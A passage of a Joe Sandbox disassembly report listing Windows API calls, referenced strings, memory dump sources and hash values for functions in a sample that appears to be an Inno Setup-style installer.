                                                            • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                            • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                            • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                            APIs
                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$Prop
                                                            • String ID:
                                                            • API String ID: 3887896539-0
                                                            • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                            • Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
                                                            • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                            • Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                            Strings
                                                            • PendingFileRenameOperations, xrefs: 00455740
                                                            • PendingFileRenameOperations2, xrefs: 00455770
                                                            • WININIT.INI, xrefs: 004557D0
                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                            • API String ID: 47109696-2199428270
                                                            • Opcode ID: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                            • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                            • Opcode Fuzzy Hash: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                            • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                            APIs
                                                            • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                            • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                            • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$EnumLongWindows
                                                            • String ID: lAB
                                                            • API String ID: 4191631535-3476862382
                                                            • Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                            • Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
                                                            • Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                            • Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
                                                            APIs
                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressDeleteHandleModuleProc
                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                            • API String ID: 588496660-1846899949
                                                            • Opcode ID: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                            • Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
                                                            • Opcode Fuzzy Hash: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                            • Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
                                                            Strings
                                                            • NextButtonClick, xrefs: 0046BF84
                                                            • Need to restart Windows? %s, xrefs: 0046C172
                                                            • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                            • API String ID: 0-2329492092
                                                            • Opcode ID: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                            • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                            • Opcode Fuzzy Hash: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                            • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                            APIs
                                                            • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ActiveChangeNotifyWindow
                                                            • String ID: $Need to restart Windows? %s
                                                            • API String ID: 1160245247-4200181552
                                                            • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                            • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                            • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                            • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                            APIs
                                                              • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                            • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                            • String ID: Creating directory: %s
                                                            • API String ID: 2451617938-483064649
                                                            • Opcode ID: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                            • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                            • Opcode Fuzzy Hash: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                            • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressByteCharMultiProcWide
                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                            • API String ID: 2508298434-591603554
                                                            • Opcode ID: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                            • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                            • Opcode Fuzzy Hash: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                            • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                            APIs
                                                            • 73E9A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                            • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                            • 73E9A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: A480A570ObjectSelect
                                                            • String ID: k H
                                                            • API String ID: 1230475511-1447039187
                                                            • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                            • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                            • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                            • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: DrawText$ByteCharMultiWide
                                                            • String ID: k H
                                                            • API String ID: 65125430-1447039187
                                                            • Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                            • Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
                                                            • Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                            • Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
                                                            APIs
                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                              • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                              • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                            • API String ID: 395431579-1506664499
                                                            • Opcode ID: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                            • Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
                                                            • Opcode Fuzzy Hash: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                            • Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
                                                            Strings
                                                            • PendingFileRenameOperations, xrefs: 00455A2C
                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
                                                            • PendingFileRenameOperations2, xrefs: 00455A3B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                            • API String ID: 47109696-2115312317
                                                            • Opcode ID: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                            • Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
                                                            • Opcode Fuzzy Hash: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                            • Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
                                                            APIs
                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                            • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileNext
                                                            • String ID:
                                                            • API String ID: 2066263336-0
                                                            • Opcode ID: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                            • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                            • Opcode Fuzzy Hash: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                            • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                            APIs
                                                            • GetMenu.USER32(00000000), ref: 00421371
                                                            • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                            • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                            • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Menu
                                                            • String ID:
                                                            • API String ID: 3711407533-0
                                                            • Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                            • Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
                                                            • Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                            • Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
                                                            APIs
                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                            • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                            • String ID:
                                                            • API String ID: 601730667-0
                                                            • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                            • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                            • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                            • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                            APIs
                                                            • 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                            • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                            • 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                            • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: A4620A480A570EnumFonts
                                                            • String ID:
                                                            • API String ID: 178811091-0
                                                            • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
